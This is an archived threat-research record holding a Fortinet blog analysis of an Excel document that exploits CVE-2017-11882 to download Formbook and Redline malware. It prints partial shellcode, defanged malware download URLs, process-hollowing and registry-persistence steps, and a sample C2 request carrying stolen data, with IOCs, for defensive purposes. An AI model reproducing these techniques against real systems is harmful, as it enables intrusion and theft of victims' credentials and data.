{
	"id": "26e5bb6f-3786-455a-accb-e6182ef234cc",
	"created_at": "2026-04-06T01:31:17.125857Z",
	"updated_at": "2026-04-10T03:22:49.726293Z",
	"deleted_at": null,
	"sha1_hash": "ee5cb265b63f4e956d5580621388140247f9e707",
	"title": "Excel Document Delivers Multiple Malware By Exploiting CVE-2017-11882 – Part I | Fortinet Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 684890,
	"plain_text": "Excel Document Delivers Multiple Malware By Exploiting CVE-2017-\r\n11882 – Part I | Fortinet Blog\r\nBy Xiaopeng Zhang\r\nPublished: 2022-09-19 · Archived: 2026-04-06 00:28:54 UTC\r\nFortiGuard Labs recently captured an Excel document with an embedded file in the wild. Of course, we do this all the time.\r\nWhat caught my eye this time is that the embedded file name is randomized, which drove me to want to analyze this Excel\r\ndocument. After some quick research on the file, I learned that it exploits a particular vulnerability —CVE-2017-11882—to\r\nexecute malicious code to deliver and execute malware on a victim’s device.\r\nIn this analysis, you will see how the crafted Excel document exploits CVE-2017-11882, what it does when exploiting the\r\nvulnerability, what malware families it can download onto a victim’s device, and what malicious actions the perpetrators can\r\nconduct.\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: Windows Users\r\nImpact: Control and Collect Sensitive Information from Victim’s Device.\r\nSeverity level: Critical\r\nDissect the Captured Excel Document\r\nThe captured Excel document is called “GAT412-IFF22.xlsx”. It is saved in OOXML format (Office Open XML, a zipped\r\nand XML-based file format) developed by Microsoft. By decompressing this file in an unzip program, as shown in Figure\r\n1.1, we can see the folder tree on the left and all files on the right. The last file, “xtgjls.4flk6W”, located in the sub-folder of\r\n“\\xl\\embeddings\\”, is the randomized embedded file.\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882\r\nPage 1 of 14\n\nFigure 1.1 – The outline of the file structure inside the Excel document\nLet’s look at how the Excel program loads the embedded file. Figure 1.2 shows the content of the relevant files. 
They are\n“..\\xl\\worksheets\\sheet1.xml” and its corresponding relationship file “..\\xl\\worksheets\\_rels\\sheet1.rels”.\nFigure 1.2 – Display of how the Excel program loads the embedded file\nIt parses the XML data of “sheet1.xml” and obtains the Ole Object data, which looks like the following.\nr:id=“rId1” sets the relationship ID defined in file “sheet1.rels”, as shown in Figure 1.2. Its “target” attribute was set\nto the string “../embeddings/xtgjls.4flk6W”, which tells the Excel program where to load the Ole Object from.\nautoLoad=“true” sets Excel to load the Ole Object automatically without prompting the victim.\nshapeId=“1907” tells Excel how to parse the data of “xtgjls.4flk6W”.\nAs you may know, CVE-2017-11882 is a vulnerability within “EQNEDT32.EXE” that can be exploited when processing\nspecially crafted equation data (formulas data). Equation data is imported in Excel documents as an embedded OLE object.\nIn this case, the Excel program uses COM (Component Object Model) objects to pass the equation data inside the file\n“xtgjls.4flk6W” to “EQNEDT32.EXE” to parse.\n“xtgjls.4flk6W” is saved in the Microsoft Compound File Binary format. There are two binary files in it,\n“rd8NsPZ44G0yvGbjKKpvH1QTwNU5u” and “[1]oLE10NATiVE”, as shown in Figure 1.3.\nFigure 1.3 – View of the crafted “xtgjls.4flk6W” file\r\n“[1]oLE10NATiVE” contains the crafted equation data, including the malicious shellcode that will be executed in the vulnerable\r\n“EQNEDT32.EXE”.\r\nHow CVE-2017-11882 is Exploited\r\nCopying null-terminated data into a local buffer without a proper length check causes a stack buffer overflow that leads\r\nto arbitrary code execution. 
The affected local buffer is only 2CH bytes long relative to the function return address.\r\nTherefore, the function return address will be overwritten if the copied data is more than 2CH bytes.\r\nFigure 2.1 – The content of “[1]oLE10NATiVE”\r\nThe highlighted block in Figure 2.1 is the null-terminated data being copied—30H bytes—while the last dword (0x42F72E)\r\n(marked with a red rectangle) is the data that overwrites the function return address.\r\nFigure 2.2 – Stack Frame when stack buffer overflow occurred\r\nFigure 2.2 shows a screenshot of the stack frame of “EQNEDT32.EXE”, where the function return address was just\r\noverwritten by 0x42F72E (the original address is 0x4115D8). Once the function returns, it will return to 0x42F72E to\r\nexecute a “ret” instruction, which pops a dword (0x18F350) into the EIP register from the top of the stack. The data starting\r\nfrom 0x18F350 is the shellcode from file “[1]oLE10NATiVE”. 
The shellcode had already been copied onto the stack.\r\nBelow is a partial list of the shellcode at 0x18F350 in the stack.\r\n0018F350 BA BF782F03 mov edx,32F78BF\r\n0018F355 81C2 7D4416FD add edx,FD16447D\r\n0018F35B 8B32 mov esi,dword ptr ds:[edx]\r\n0018F35D 8B2E mov ebp,dword ptr ds:[esi]\r\n0018F35F BE 43FC3381 mov esi,8133FC43\r\n0018F364 81F6 F39B7581 xor esi,81759BF3\r\n0018F36A 8B0E mov ecx,dword ptr ds:[esi]\r\n0018F36C 55 push ebp\r\n0018F36D FFD1 call ecx           ;;;; \u003ckernel32.GlobalLock\u003e\r\n0018F36F 05 88FBAA47 add eax,47AAFB88\r\n0018F374 05 4BF65DB8 add eax,B85DF64B\r\n0018F379 FFE0 jmp eax         ;;;; jump to decrypt dynamic code\r\n0018F37B 022E add ch,byte ptr ds:[esi]\r\n0018F37D F742 00 00E76000 test dword ptr ds:[edx],60E700\r\n0018F384 04 F5 add al,F5\r\n[…]\r\nIt calls the API GlobalLock() to get a buffer address inside “EQNEDT32.EXE”’s memory with the entire data of\r\n“[1]oLE10NATiVE”. It then calculates an offset of a piece of obfuscated code and executes it. This code is then used to decrypt\r\na set of dynamic code and strings.\r\nThe decrypted code dynamically loads some APIs, such as ExpandEnvironmentStringsW(), URLDownloadToFileW(),\r\nWideCharToMultiByte(), WinExec(), and ExitProcess(). It then calls the API URLDownloadToFileW() to download an exe\r\nfile from a URL.\r\nFigure 2.3 – The malware is about to call the API URLDownloadToFileW()\r\nFigure 2.3 is a screenshot of a debugger that breaks at the API URLDownloadToFileW(). As you may notice, its second\r\nparameter is a URL of the file to be downloaded, which is a decrypted string—“hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/Cikncbxlojqanjsfotzhopechujkgkeeyz.exe”. 
The third parameter of this API is the local file name under which the\r\ndownloaded file is saved, which is “C:\\Users\\{UserName}\\AppData\\Roaming\\word.exe”.\r\nNext, it calls the API WinExec() to start the downloaded file (“C:\\Users\\{UserName}\\AppData\\Roaming\\word.exe”). After\r\nthat, the malware starts on the victim’s machine. The last step of the shellcode is to call the API ExitProcess() to terminate\r\nthe exploited “EQNEDT32.EXE” process.\r\nUnfortunately, I was not able to obtain the downloaded file. Instead, I received a 404 error code from the website that the file\r\nwas no longer available. Nevertheless, after going through the malware sample logs, I found something useful about this\r\nwebsite that interested me.\r\nBased on the URL’s patterns, I found many samples using a similar URL to download malware, and from them, I learned\r\nthat the website was used to deliver two malware families, Formbook and Redline. Therefore, the missing download file is\r\nprobably either Formbook or Redline.\r\nThe following table lists the malware and relevant URLs that I’ve obtained from the logs. 
I will then pick one sample for\r\neach of the two malware families from the table to continue my analysis.\r\nMalware URLs\r\n“Formbook” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/lsbjqoyofgkmqbuleooykdekgopmtglvjl.exe\r\n“Formbook” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/ueNusTuRz84DVHA.exe\r\n“Formbook” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/linecol_v4.1.1.exe\r\n“Formbook” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/k2p5vFXxdMpidBJ.exe\r\n“Redline” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/almac.exe\r\n“Formbook” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/fmbj2.exe\r\n“Formbook” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/onshedy.exe\r\n“FormBook” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/fbfslispuuepzv0.exe\r\n“Redline” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/storj.exe\r\n“Redline” hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/hAiNVxLRl3ayBcV.exe\r\nFormbook Malware\r\nI picked the “lsbjqoyofgkmqbuleooykdekgopmtglvjl.exe” file (being saved as\r\n“C:\\Users\\{UserName}\\AppData\\Roaming\\word.exe”) as an example to analyze. It is the latest Formbook sample in the malware\r\nsample logs.\r\n“FormBook” is well-known commercial malware. It has been sold as “malware-as-a-service” (MaaS) since 2016. It is\r\ndesigned to steal sensitive information from a victim’s device and control it using some Control Commands.\r\nIn this analysis, I will explain how this sample performs on the victim’s device.\r\nFormbook Downloader and Loader\r\nThe exe file was developed using the Borland Delphi language. 
Based on my analysis, it is a Formbook downloader and loader.\r\nFormbook uses complicated techniques to prevent itself from being easily detected and analyzed. Let’s go on to see\r\nhow it does that.\r\nOnce it runs, it extracts a Dll file into memory from one of its Bitmap resources (named “BBOKK”), as shown in Figure 3.1.\r\nFigure 3.1 – A Dll file will be extracted from “BBOKK”\r\nWhen the main form’s FormCreate() function is called, it reads the Bitmap data from the Resource section and decrypts it\r\ninto a Dll file (referred to as “BBOKK” Dll). Next, it deploys the “BBOKK” Dll in memory, and its entry function is called\r\nat the end.\r\nThe “BBOKK” Dll file is another Delphi-compiled file. It starts a timer to run a timer function after sleeping 9 seconds by\r\ncalling the API timeSetEvent().\r\nThe purpose of the timer function is to download the Formbook payload and then execute it on the victim’s device.\r\nFigure 3.2 – Download the Formbook payload file\r\nFigure 3.2 is a screenshot of when “BBOKK” Dll downloads the Formbook payload file by calling the API\r\nInternetOpenUrlA(). Its second parameter is a URL to the file, as shown in memory. 
It was stored as an attachment on\r\nDiscord’s CDN (content delivery network).\r\nThe attacker encrypted and transformed this file many times to protect its payload file from being blocked and detected.\r\nAfter four rounds of decryption and data reversal, we could finally obtain the Formbook payload file, as shown in Figure 3.3.\r\nFigure 3.3 – Just decrypted Formbook payload file and its size in memory\r\nHollowed Process to Execute Formbook\r\nThere are three Windows process strings predefined inside “BBOKK” Dll, as seen below:\r\n“C:\\Windows\\System32\\calc.exe”\r\n“C:\\Windows\\System32\\rasphone.exe”\r\n“C:\\Windows\\System32\\cmd.exe”.\r\nThe malware randomly picks one process from them to perform a process hollowing attack. It first needs to create the\r\npicked process in a suspended state. Next, it must inject the Formbook payload file into its memory and deploy it. And\r\nfinally, it copies and creates a remote thread in the picked process whose thread function will execute the injected Formbook\r\nby calling its entry function.\r\nTo finish this, it calls a bunch of APIs, such as CreateProcessW(), VirtualAllocEx(), WriteProcessMemory(),\r\nCreateRemoteThread() and ReadProcessMemory().\r\nFigure 4.1 is a screenshot of a debugger showing where it breaks at API CreateProcessW() with certain parameters, like the\r\nrandomly picked process (which was “C:\\Windows\\System32\\rasphone.exe” this time) and the CreateFlags value of 0x44, which\r\nis a flag combination of CREATE_SUSPENDED and IDLE_PRIORITY_CLASS.\r\nFigure 4.1 – Break at API CreateProcessW() to create a suspended process\r\nAfter this point, the Formbook payload file will run inside the randomly picked process.\r\nMaintaining Persistence on the Victim’s Device\r\n“BBOKK” Dll is in charge of establishing Formbook persistence on the victim’s device. 
Once it obtains the Formbook\r\npayload file, it creates a string value under the sub-key “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run” of the\r\nsystem registry, as shown in Figure 5.1.\r\nFigure 5.1 – Formbook is added into the auto-run group of the system registry\r\nThe auto-run entry is “C:\\Users\\Public\\Libraries\\foyoqjbsL.url”. This is an Internet Shortcut file (*.url) usually used to\r\nopen a website within a web browser. The “URL” property holds the full path of a local file (where a website’s\r\naddress would normally appear), as shown in Figure 5.2. It is “C:\\Users\\Public\\Libraries\\Lsbjqoyof.exe”, which was copied from the\r\n“lsbjqoyofgkmqbuleooykdekgopmtglvjl.exe” file. As a result, Formbook will start when the system starts via the\r\n“foyoqjbsL.url” file.\r\nFigure 5.2 – The property of “foyoqjbsL.url”\r\nFormbook Payload\r\nI previously performed a deep analysis of another Formbook variant spread in a phishing campaign with an attached\r\nPowerPoint document. For detailed information regarding that Formbook sample, you can refer to Part I, Part II, and Part\r\nIII.\r\nI compared the code, data structure, and features between the fresh variant and that previous one. 
I found no significant\r\nchanges between them.\r\nThe process randomly picked by “BBOKK” Dll (like “rasphone.exe”) plays the same role as the “AddInProcess32.exe”\r\nanalyzed in Part II of my previous analysis.\r\nThey both have the same data structures and features, such as:\r\nThe “Configuration Object”.\r\nIts “Anti-analysis Techniques”.\r\nInjecting Formbook into a Windows process via Explorer.exe as a central control program.\r\nInserting Formbook into target processes, like web browsers, email clients, IM clients, and FTP clients, from which it\r\nsteals sensitive information.\r\nUsing the C2 server’s control commands (“1” to “9”) to control the device and conduct extra tasks, like executing a\r\ngiven malware, upgrading Formbook, deleting keys/values from the system registry, rebooting/powering off the\r\ndevice, and more.\r\nThis fresh variant has a new C2 server list, which is decrypted before use. It has 143 encrypted strings, and 64 of the 143 are\r\nC2 servers. I wrote a script to decrypt all its strings inside Formbook. 
For your information, Figure 6.1 is a partial list of the\r\ndecrypted strings and C2 servers.\r\nFigure 6.1 – Partial decrypted strings from Formbook\r\nThe full list of C2 servers this variant carries has been added to the IOC section located at the end of this report.\r\nWhen Formbook needs to submit the stolen data to a C2 server, it encrypts the data and encodes it with a Base64 algorithm.\r\nThe following is an example of the HTTP GET request Formbook sent to its C2 server.\r\nhxxp[:]//www[.]waraporn[.]net/dy47/?\r\nRt=cJEPCFYxXhcTq\u0026nBZhXF=VgD07dflFaksGVxdFL46l5VyvbABpSxwWaaMvOL1tn3EVaDMwmxyqfSWThCs5+vZuoswEw==\r\nWhere:\r\n“www[.]waraporn[.]net” is the C2 server host.\r\n“dy47” comes from a decrypted constant string, “www.irolexwatchs.com/dy47/”.\r\nThe Base64-encoded string after “?” is the stolen data from the victim’s device.\r\nIn the next part of this analysis, I will pick one of the Redline samples from the above malware table to research and explain\r\nwhat it can do to the victim’s device.\r\nFortinet Protections\r\nFortinet customers are already protected from this FormBook variant with FortiGuard’s Web Filtering, IPS, and AntiVirus\r\nservices as follows:\r\nThe downloading URLs and C2 servers are rated as “Malicious Websites” by the FortiGuard Web Filtering service.\r\nThe vulnerability CVE-2017-11882 is protected against by the IPS signature\r\nMS.Office.EQNEDT32.EXE.Equation.Parsing.Memory.Corruption.\r\nThe FortiGuard CDR (content disarm and reconstruction) service can disarm the embedded file inside the Excel document.\r\nThe FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. The Fortinet AntiVirus\r\nengine is a part of each of those solutions. 
As a result, customers who have these products with up-to-date protections are\r\nprotected.\r\nWe also suggest our readers go through the free NSE training: NSE 1 – Information Security Awareness, which has a\r\nmodule on Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks.\r\nIOCs:\r\nURLs:\r\nhxxp[:]//lutanedukasi[.]co[.]id/wp-includes/Cikncbxlojqanjsfotzhopechujkgkeeyz.exe\r\nhxxp[:]//lutanedukasi[.]co[.]id/wp-includes/lsbjqoyofgkmqbuleooykdekgopmtglvjl.exe\r\nhttps[:]//cdn[.]discordapp[.]com/attachments/937614907917078588/1009001073970794576/Lsbjqoyofgkmqbuleooykdekgopmtgl\r\nFormbook C2 Server List:\r\nSample SHA-256\r\n[GAT412-IFF22.xlsx]\r\nD1EA94C241E00E8E59A7212F30A9117393F9E883D2B509E566505BC337C473E3\r\n[Formbook, lsbjqoyofgkmqbuleooykdekgopmtglvjl.exe]\r\nC7B7CC6B73B04E2CD7D026A69D47139770ACE5A92457DA0F0C058EE438251B18\r\nSource: https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882"
	],
	"report_names": [
		"excel-document-delivers-malware-by-exploiting-cve-2017-11882"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439077,
	"ts_updated_at": 1775791369,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ee5cb265b63f4e956d5580621388140247f9e707.pdf",
		"text": "https://archive.orkl.eu/ee5cb265b63f4e956d5580621388140247f9e707.txt",
		"img": "https://archive.orkl.eu/ee5cb265b63f4e956d5580621388140247f9e707.jpg"
	}
}